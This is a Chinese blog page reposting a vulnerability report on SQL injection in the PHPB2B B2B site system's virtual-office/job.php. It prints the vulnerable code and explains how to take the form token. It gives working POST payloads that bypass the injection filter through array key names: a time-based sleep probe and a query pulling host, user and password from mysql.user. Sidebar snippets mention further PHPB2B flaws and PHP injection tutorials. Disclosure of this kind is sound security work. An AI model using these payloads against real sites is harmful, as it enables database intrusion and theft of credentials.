php注入某大型网站,PHPB2B网站管理系统SQL注入漏洞(无视防注入)

最新推荐文章于 2023-05-13 00:11:21 发布
最新推荐文章于 2023-05-13 00:11:21 发布
阅读量283 收藏
点赞数
文章标签: php注入某大型网站

### 简要描述:

RT

### 详细说明:

```

注入链接:/virtual-office/job.php

注入参数:job

漏洞代码:(第52行开始)

if (!empty($_POST['job']) && $_POST['save']) {

$vals = $_POST['job'];

pb_submit_check('job'); // 验证post提交的token,可直接使用get访问job.php后在网页源码中搜索formhash获取

$now_job_amount = $job->findCount(null, "created>".$today_start." AND member_id=".$the_memberid);

if (isset($_POST['id'])) {

$id = $_POST['id'];

}

if(!empty($_POST['expire_time'])) {

$vals['expire_time'] = Times::dateConvert($_POST['expire_time']);

}

$check_job_update = $g['job_check'];

if ($check_job_update=="0") {

$vals['status'] = 1;

$message_info = 'msg_wait_success';

}else {

$vals['status'] = 0;

$message_info = 'msg_wait_check';

}

$vals['industry_id'] = PbController::getMultiId($_POST['industry']['id']);

$vals['area_id'] = PbController::getMultiId($_POST['area']['id']);

if(!empty($id)){

$vals['modified'] = $time_stamp;

unset($vals['created']);

$result = $job->save($vals, "update", $id, null, "member_id=".$the_memberid);

$vals = $_POST['job'];从post中获取job数组参数,并将$vals数组传入save函数,save函数中通过以下以下代码构造SQL语句:(libraries/core/model.php)

$keys = array_keys($posts);

$cols = implode($keys,",");

$tbname = (is_null($tbname))? $this->getTable():trim($tbname);

$this->table_name = $tbname;

if(!empty($id)){

$sql = "SELECT $cols FROM ".$tbname." WHERE ".$this->primaryKey."='".$id."'";

在save函数中$vals数组的键名会被拆分为select语句的列名列表$cols,由于$vals可控导致sql注入,且是数组键名,因此可绕过代码中的注入检测

```

### 漏洞证明:

```

漏洞测试:

首先直接访问:http://127.0.0.1/phpb2b/virtual-office/job.php查看网页源代码获取页面token

```

[1.png](https://images.seebug.org/upload/201502/09110949ca4552ecb3b7536022523b2f60ae1def.png)

```

获取token后就可以进行SQL注入

http://127.0.0.1/phpb2b/virtual-office/job.php

Post:

job[if((length(user())>61),1,sleep(5))%23]=1&save=1&id=1&formhash=8ab96122454d5f50

为了方便调试,在代码里把执行的SQL语句打印出来

```

[2.png](https://images.seebug.org/upload/201502/09110936eae8f7d94a4e694631b2d50273e4e61c.png)

```

Mysql日志:

```

[3.png](https://images.seebug.org/upload/201502/0911092864ddccf8bded520eab1462b57583fcd6.png)

```

成功执行延时注入

可无视SQL注入检测,执行SQL语句

http://127.0.0.1/phpb2b/virtual-office/job.php

Post:

job[host,user,password/**/from/**/mysql.user/**/where/**/1>0/**/limit/**/0,1%23]=1&save=1&id=1&formhash=8ab96122454d5f50

```

[4.png](https://images.seebug.org/upload/201502/0911091542e1bc9fcb3c879c20eb1f96d9fb5151.png)

```

Mysql日志:

```

[5.png](https://images.seebug.org/upload/201502/091109050ba39795ae04fe0f1cf611bccd770d02.png)

```

```

loading-bars.svg

陈劳斯
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
php查看mysql密码破解_PHPB2B某处漏洞直接查看mysql密码
weixin_34583171的博客
02-03 282
### 简要描述:PHPB2B某处漏洞直接查看mysql密码### 详细说明:PHPB2B某处漏洞直接查看mysql密码官网下载的最新版install/install.php安装文件,查看下代码。```/*** [PHPB2B] Copyright (C) 2007-2099, Ualink Inc. All Rights Reserved.* The contents of ...
php内容过滤绕过,PHPB2B注入(绕过过滤)
weixin_36310141的博客
03-24 218
### 简要描述:PHPB2B某处注入。绕过过滤。### 详细说明:官方最新版本.https://github.com/ulinke/phpb2b/archive/master.zip漏洞文件。virtual-office/offer.phpPOST /virtual-office/offer.phpContent-Disposition: form-data; name="data[trade]...
php 存储型跨站,PHPB2B存储型跨站(可打管理员和任意用户)
weixin_35817602的博客
03-26 138
### 简要描述:PHPB2B v5.0.2对字段过滤不严格导致存储型跨站,可嵌入任意脚本文件,攻击管理员和任意用户。### 详细说明:1、phpB2B对用户发布供求信息模块,没有进行有效过滤,存在漏洞的字段包括主题、包装说明、价格说明等等。攻击者可以插入恶意代码,后台管理员审核用户供求信息时,漏洞触发,审核过程中,管理员并不会发现任何恶意代码,审核一旦成功,其它任何用户浏览供求信息时,便会触发漏...
PHPB2B:纯粹的商贸网站开源软件
CURSED!
11-05 261
PHPB2B前身叫友邻B2B,是国内首家开放源代码的B2B建站程序。可以为互联网用户、创业团队快速构建B2B分类信息系统、商贸网站、电子商 务网站等多种形式的电子商务行业网站平台, 该系统基于PHP+Mysql开发, 采用优秀的MVC架构思想,同时本系统采用了流行的Smarty模板技术, 静态模板与动态程序完全分离,系统自带十余个内容丰富的调用标签,同时可自由扩展各种插件或其他功能, 秉承开...
php b2b 设计思路,phpb2b研究(八) ----广告
weixin_39846612的博客
03-21 81
---- 表的结构 `pb_adses` ----广告表--CREATE TABLE IF NOT EXISTS `pb_adses` (`id` smallint(6) NOT NULL auto_increment,`adzone_id` smallint(3) NOT NULL default '0',`title` varchar(50) NOT NULL default '',`de...
PHPB2B电子商务网站管理系统 v6.0
11-06
PHPB2B电子商务网站管理系统 v6.0 是一个专为构建B2B(Business-to-Business)行业门户设计的开源电子商务解决方案。这个系统基于PHP编程语言和MySQL数据库,利用MVC(Model-View-Controller)架构,确保了代码的...
PHPB2B电子商务网站管理系统源代码
03-18
友邻PHPB2B是一款基于PHP程序和Mysql数据库、以MVC架构为基础的开源B2B行业门户电子商务网站建站系统,系统代码完整、开源,功能全面,架构优秀,提供良好的用户体验、多国语言化及管理平台,是目前搭建B2B行业门户...
基于PHP的友邻PHPB2B电子商务网站管理系统源码.zip
最新发布
01-14
【标题】中的“基于PHP的友邻PHPB2B电子商务网站管理系统源码”指的是一个使用PHP编程语言开发的电子商务平台,特别关注B2B(Business-to-Business)业务模式。在B2B系统中,企业间可以进行产品和服务的交易,这种...
基于PHP的友邻PHPB2B电子商务网站管理系统 v6.0.zip
08-29
"基于PHP的友邻PHPB2B电子商务网站管理系统 v6.0" 是一款使用PHP编程语言开发的商务对商务(Business-to-Business, B2B)电商平台的管理系统。标题中的 "v6.0" 指示这是该系统的第六个主要版本,通常意味着它经过了...
基于PHP的友邻PHPB2B电子商务网站管理系统.zip
08-29
基于PHP的友邻PHPB2B电子商务网站管理系统.zip
phpb2b:PHPB2B是一个开源和免费的b2b程序
05-24
PHPB2B PHPB2B是Ualink社区提供的免费开源B2B程序,一直致力于为企业提供出色的开源电子商务解决方案。 自从第一版于2007年发布以来,已有12年的历史。 它是为数不多的持续提供更新的开源B2B系统之一。 我们的目标是使更多企业能够快速建立行业电子商务网站,而无需关注程序开发和繁琐的设置,从而使企业专注于运营。 对于用户而言,它可以促进交易并在平台上找到买家。 对于开发人员来说,它还具有强大的可定制性,丰富的插件界面和精美的主题模板。 可以预料,PHPB2B将成为企业走向电子商务的首选。 一些方便的链接 非常快速的阿里巴巴b2b克隆脚本。 -PHPB2B论坛。 -PHPB2B演示。 得到支持! -有问题吗? 请告诉我们! 安全漏洞说明 对于安全漏洞,请通过service#ualink.net与我们联系,并且不要在GitHub Issue上发布。 提交安全漏洞
PHPB2B电子商务平台__开源版
02-27
安装步骤: 第一步:修改根目录和admin目录下的myconnect.php 文件为您的数据库连接。 第二步:打开phpMyadmin,导入xpbbcom.sql文件。 第三步:上传文件包,并且使 1. thumbs1 2. thumbs2 3. uploadedimages 4. 管理/sbbleads_icons 为可写入权限。 如果有更多疑问,请到[url]http://bbs.xpbb.com/forum-37-1.html[/url]提问。 后台登陆地址:/admin/ 帐号:admin 密码:admin
phpb2b:开源和免费的b2b脚本-开源
05-10
使用PHPB2B(开源php b2b脚本)构建b2b贸易门户,并从以下网站获取帮助:https://sourceforge.net/apps/phpbb/phpb2b/
友邻B2B系统(PHPB2B) 6.0.3
05-01
友邻B2B网站系统(PHPB2B)是一款基于PHP程序和Mysql数据库、以MVC架构为基础的开源B2B行业门户电子商务网站建站系统,系统代码完整、开源,功能全面,架构优秀,提供良好的用户体验、多国语言化及管理平台,是目前搭建B2B行业门户网站最好的程序。 友邻B2B系统(PHPB2B) 6.0.3 更新日志:2019-12-17 修复一些错误。
shell 工具_Kali Linux渗透工具【八】:系统命令注入漏洞工具 – Commix使用
weixin_39986973的博客
12-15 911
声明:【Kali与编程】所有分享,仅做学习交流,切勿用于任何不法用途,否则后果自负!一、Commix是什么?Commix由Python编写的一款工具,它是一个适用于web开发者、渗透测试人员及安全研究者的自动化测试工具,可以帮助他们更高效的发现web应用中的命令注入攻击相关漏洞。在Kali Linux中自带有Commix这款工具。二、Commix补充介绍。Commix是为了方便的检测一个请求是否存...
php留言系统
dengfengling999的博客
05-09 3796
连接数据库,connet.php: <meta charset="utf-8"> <?php $conn=mysqli_connect("localhost","root","123456","ly")or die("连接数据库服务器失败!".mysqli_error()); mysqli_query($conn,"set names utf8"); ?> 登录页面Login.php: <html> <head> <title>登录.
PHP代码注入PHP语言常见可注入函数以及PHP代码注入漏洞的利用实例
m0_64378913的博客
06-26 6884
目录1 PHP注入概述2 相关函数与语言结构2.1 eval()函数2.2 assert()函数2.3 preg_replace()函数2.4 call_user_func()函数2.5 动态函数`$a($b)`3 总结 1 PHP注入概述 RCE概念:remote command/code execute,远程命令/代码执行。 PHP代码执行:在WEB中,PHP代码执行是指应用程序过滤不严,用户可用通过请求将代码注入到应用中执行。 PHP代码注入SQL注入比较: 其注入思想是类似的,均是构造语句绕过服务
PHP代码注入PHP代码注入漏洞
cc
03-06 6104
call_user_func()等函数都有调用其他函数的功能,其中的一个参数作为要调用的函数名,那如果这个传入的函数名可控,那就可以调用意外的函数来执行我们想要的代码,也就是存在任意代码执行漏洞。以call_user_func($fun,$para)函数为例,该函数的第一个参数作为回调函数,后面的参数为回调函数的参数,将$para这个参数传递给$fun这个函数去执行。我们可以利用file_get_contents()函数,写入文件,该函数的作用在于将第二个参数作为内容写入到第一个参数的文件中。
PHP的代码注入是什么意思?底层原理是什么?
长风破浪会有时的博客
05-13 338
当应用程序接收到用户提交的数据时,如果没有对数据进行充分的过滤和验证,攻击者就有可能通过构造恶意的输入,在应用程序中注入一些非法的代码。PHP的代码注入(Code Injection)指的是攻击者通过构造恶意的输入,在应用程序中注入一些非法的代码,从而在应用程序中执行攻击者的指令或代码。这种攻击方式通常会利用应用程序的漏洞,例如未对输入数据进行充分的过滤和验证,导致攻击者可以在应用程序中执行任意代码,造成严重的安全风险,如数据库被盗、系统崩溃等。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值